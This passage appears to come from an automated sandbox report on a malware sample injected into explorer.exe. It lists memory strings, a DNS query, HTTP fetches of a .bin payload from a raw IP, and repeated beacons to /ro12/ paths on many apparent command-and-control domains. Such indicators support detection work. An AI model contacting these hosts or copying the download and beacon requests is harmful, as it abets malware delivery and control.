      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.justinmburns.com/ro12/
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.justinmburns.comReferer:
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ktrandnews.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ktrandnews.com/ro12/
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ktrandnews.com/ro12/www.nala.dev
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ktrandnews.comReferer:
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.los3.online
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.los3.online/ro12/
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.los3.online/ro12/www.start399.com
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.los3.onlineReferer:
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nala.dev
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nala.dev/ro12/
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nala.dev/ro12/www.rptiki.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nala.devReferer:
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.niaeoer.com
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.niaeoer.com/ro12/
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.niaeoer.com/ro12/www.shuraop.xyz
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.niaeoer.comReferer:
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ps212naming.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ps212naming.com/ro12/
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ps212naming.com/ro12/www.pwpholdings.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ps212naming.comReferer:
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pwpholdings.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pwpholdings.com/ro12/
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pwpholdings.com/ro12/www.justinmburns.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pwpholdings.comReferer:
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qualityquickprints.com
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qualityquickprints.com/ro12/
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qualityquickprints.com/ro12/www.55dy5s.top
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qualityquickprints.comReferer:
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.riderarea.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.riderarea.com/ro12/
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.riderarea.com/ro12/www.shuraop.xyz
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.riderarea.comReferer:
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rptiki.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rptiki.com/ro12/
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rptiki.com/ro12/www.tiktok-shop-he.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rptiki.comReferer:
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.senior-living-91799.bond
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.senior-living-91799.bond/ro12/
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.senior-living-91799.bond/ro12/www.riderarea.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.senior-living-91799.bondReferer:
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shuraop.xyz
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shuraop.xyz/ro12/
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shuraop.xyz/ro12/www.ktrandnews.com
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shuraop.xyz/ro12/www.qualityquickprints.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shuraop.xyzReferer:
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.start399.com
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.start399.com/ro12/
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.start399.com/ro12/www.niaeoer.com
      Source: explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.start399.comReferer:
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiktok-shop-he.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiktok-shop-he.com/ro12/
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiktok-shop-he.com/ro12/www.holzleisten24.shop
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiktok-shop-he.comReferer:
      Source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xlrj.asia
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xlrj.asia/ro12/
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xlrj.asia/ro12/www.fathomtackle.com
      Source: explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xlrj.asiaReferer:
      Source: explorer.exe, 00000004.00000000.9893746517.00000000030A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14564355374.00000000030A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppader.icos
      Source: explorer.exe, 00000004.00000002.14570074014.0000000009556000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.0000000009556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
      Source: explorer.exe, 00000004.00000003.11271243917.000000000D34B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12110546244.000000000D34D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14579496985.000000000D34C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11265701285.000000000D33D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000004.00000003.11271243917.000000000D34B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12110546244.000000000D34D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14579496985.000000000D34C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11265701285.000000000D33D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS14
      Source: explorer.exe, 00000004.00000000.9897491783.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12109712536.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.000000000974E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000004.00000000.9897491783.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12109712536.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.000000000974E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/-
      Source: explorer.exe, 00000004.00000000.9897491783.0000000009556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000004.00000003.12109712536.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.00000000096B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=837905BAEC0C411B9E107B0D8A1DEA83&timeOut=5000&oc
      Source: explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000004.00000003.12109712536.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.00000000096B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com-
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyCloudyDay.svg
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRIg
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRIg-dark
      Source: explorer.exe, 00000004.00000000.9902197549.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11264501949.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14578477014.000000000D1A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.queryF
      Source: explorer.exe, 00000004.00000002.14579257959.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12111240915.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11270980029.000000000D30B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1721px.img
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO6J5d.img
      Source: explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBTUSNp.img
      Source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: explorer.exe, 00000004.00000003.12109712536.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.00000000096B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comQJ
      Source: explorer.exe, 00000004.00000003.11262903343.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11268545969.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14577565599.000000000D0C3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.come
      Source: explorer.exe, 00000004.00000000.9902197549.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11264501949.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14578477014.000000000D1A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://th.bing.
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/tm
      Source: explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000004.00000002.14579257959.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12111240915.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11270980029.000000000D30B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comt.
      Source: explorer.exe, 00000004.00000002.14584974938.00000000142DF000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.ktrandnews.com/ro12/?3fY=-ZkX&pR-=gjAFVEeeiH9OAOPDCKjXPtqfGvq//Fy/v54m7kKmQemvHE2y
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/europe-gives-mark-zuckerberg-24-hours-to-respond-about-israe
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/retirement/is-it-normal-to-retire-at-66-how-the-us-compares-to-10-ot
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/house-gop-picks-steve-scalise-as-speaker-nominee-but-unclear
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/sen-mitt-romney-urged-democratic-senators-to-challenge-biden
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-solar-eclipse-will-cross-san-diego-this-weekend-here-s-h
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/ancient-maya-kings-may-have-already-told-us-how-to-solve-o
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/initial-us-intelligence-suggests-iran-was-surprised-by-the-hama
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/rockets-fly-planes-grounded-americans-struggle-to-escape-war-i
      Source: explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: unknownDNS traffic detected: queries for: www.los3.online
      Source: C:\Windows\explorer.exeCode function: 4_2_0A72FF82 getaddrinfo,setsockopt,recv,4_2_0A72FF82
      Source: global trafficHTTP traffic detected: GET /pcd/wAYOlXAIjrMljL79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: 103.72.68.128Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.start399.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.niaeoer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.qualityquickprints.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.55dy5s.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.holzleisten24.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.xlrj.asiaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.fathomtackle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.digitalserviceact.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.ddbetting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.ps212naming.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=uAil5XdBoZ+2CkbxeHQt0E2a6PqX6RKuOQ+ejqYxtKGY7TwYTqnnbJE3/J+NrU/b1JZc&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.pwpholdings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo HTTP/1.1Host: www.55dy5s.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?pR-=TUQv1xq+sor4G/cf0NME9zAsbR56SjOR/AikpQZ6liEkkl3DXF9T0sERNIDZexcZDDH8&3fY=-ZkX HTTP/1.1Host: www.senior-living-91799.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/ HTTP/1.1Host: www.riderarea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /ro12/?3fY=-ZkX&pR-=gjAFVEeeiH9OAOPDCKjXPtqfGvq//Fy/v54m7kKmQemvHE2y+/COmLQxuu8r1C37UwGV HTTP/1.1Host: www.ktrandnews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
